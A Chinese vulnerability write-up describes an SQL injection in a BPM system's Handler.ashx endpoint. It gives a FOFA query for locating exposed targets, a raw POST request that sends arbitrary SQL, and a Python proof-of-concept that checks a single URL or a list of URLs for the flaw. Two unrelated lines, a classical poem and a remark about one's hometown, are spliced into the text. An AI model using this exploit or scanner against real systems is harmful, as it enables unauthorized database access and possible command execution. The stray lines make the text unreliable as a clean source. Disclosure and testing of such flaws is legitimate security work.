声明:本文档或演示材料仅供教育和教学目的使用,任何个人或组织使用本文档中的信息进行非法活动,均与本文档的作者或发布者无关。
文章目录
- 漏洞描述
- 漏洞复现
- 测试工具
漏洞描述
某骋BPM系统是一款功能全面的商业流程管理平台,旨在帮助企业实现业务流程的自动化和优化。该系统集成了工作流引擎、表单设计、报表分析等核心功能,可以帮助企业快速建立起标准化的业务流程,提高工作效率和管理透明度。某骋BPM支持多种行业应用场景,如采购审批、费用报销、合同管理等,拥有丰富的行业模板,能够快速部署上线。同时,系统提供可视化的流程建模工具,让业务人员也能轻松参与流程设计和优化。凭借强大的功能和出色的用户体验,驰骋BPM助力企业实现数字化转型,提升整体运营管理水平。其接口Handler.ashx存在SQL注入漏洞,攻击者可通过该漏洞获取数据库敏感信息,也可通过数据库执行系统命令。
漏洞复现
信息收集
fofa:body="BP.WF.HttpHandler.WF_Portal"
清江一曲抱村流,长夏江村事事幽。
构造数据包
POST /WF/Comm/Handler.ashx?DoType=RunSQL_Init HTTP/1.1
Host:ip
User-Agent: Mozilla/5.0 (X11; CrOS i686 3912.101.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.116 Safari/537.36
Content-Type: multipart/form-data; boundary=----3Vn7mG2Td4Aq6Ew8Zj9Px5Bh1
Content-Length: 147
------3Vn7mG2Td4Aq6Ew8Zj9Px5Bh1
Content-Disposition: form-data; name="SQL"
SELECT HASHBYTES('MD5', '123456')
------3Vn7mG2Td4Aq6Ew8Zj9Px5Bh1--
成功回显,证明漏洞存在。
测试工具
poc
import requests
import urllib3
from urllib.parse import urljoin,quote
import argparse
import ssl
import re
ssl._create_default_https_context = ssl._create_unverified_context
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
def read_file(file_path):
with open(file_path, 'r') as file:
urls = file.read().splitlines()
return urls
def check(url):
url = url.rstrip("/")
target = urljoin(url, "/WF/Comm/Handler.ashx?DoType=RunSQL_Init")
headers = {
"User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36",
"Content-Type": "multipart/form-data; boundary=----3Vn7mG2Td4Aq6Ew8Zj9Px5Bh1"
}
data='------3Vn7mG2Td4Aq6Ew8Zj9Px5Bh1\r\nContent-Disposition: form-data; name="SQL"\r\n\r\nSELECT HASHBYTES(\'MD5\', \'123456\')\r\n------3Vn7mG2Td4Aq6Ew8Zj9Px5Bh1--'
try:
response = requests.post(target, verify=False, headers=headers, timeout=5,data=data)
if response.status_code == 200 and '4QrcOUm6Wau+VuBX8g+IPg==' in response.text :
print(f"\033[31mDiscovered:{url}: CCBPM_Handler_Init_SQLInject!\033[0m")
return True
except Exception as e:
pass
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("-u", "--url", help="URL")
parser.add_argument("-f", "--txt", help="file")
args = parser.parse_args()
url = args.url
txt = args.txt
if url:
check(url)
elif txt:
urls = read_file(txt)
for url in urls:
check(url)
else:
print("help")
运行截图
人们之所以会怀念故乡,是因为心爱的人就在故乡。
